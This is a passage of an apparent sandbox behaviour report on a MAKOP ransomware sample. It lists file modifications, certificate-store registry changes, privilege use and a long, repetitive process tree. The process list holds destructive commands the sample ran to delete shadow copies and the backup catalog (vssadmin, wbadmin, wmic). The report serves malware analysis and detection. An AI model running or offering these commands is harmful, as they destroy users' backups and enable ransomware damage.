| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0300912.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\MSO.ACL | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\VelvetRose.css | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_right_pressed.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Hermosillo | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Asia\Beirut | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\drag.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
Enumerates physical storage devices
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe"
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe"
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
